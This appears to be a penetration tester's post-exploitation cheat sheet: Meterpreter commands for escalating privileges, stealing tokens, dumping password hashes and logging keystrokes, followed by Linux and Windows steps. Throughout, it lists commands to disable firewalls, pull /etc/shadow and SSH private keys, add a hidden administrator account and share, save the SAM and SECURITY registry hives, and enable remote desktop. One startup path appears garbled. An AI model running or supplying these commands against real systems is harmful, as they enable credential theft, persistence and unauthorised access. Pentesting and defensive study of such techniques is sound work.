<h2>Information Gathering</h2>
getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets
<h2>Escalating Privs</h2>
ps then migrate
getsystem
Tokens (use incognito)
list_tokens -u
impersonate_token
steal_token [pid]
rev2self
Retrieve Passwords
hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
Session
enumdesktops
getdesktop
setdesktop
uictl disable keyboard
Keylog
keyscan_start
keyscan_dump
keyscan_stop
Nix Post Auth
Disable Firewall
/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules
Files to pull
/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/groups OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers
User Information
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*
<h2>Windows Post Auth</h2>
Get current logged in user
@echo %USERNAME%
Add user
net user pentest password /add
net localgroup administrators pentest /add
Add share
net share nothing$=C:\ /grant:pentest,FULL /unlimited
Disable Firewall
netsh firewall set opmode disable
Auto Start Directories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\wmiOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\
Accounts and Policies
net localgroup administrators OR net localgroup administrators /domain
net group “Domain Admins” /domain
net accounts ## or net accounts /domain
Files to pull
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive
Enable Remote Desktop
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f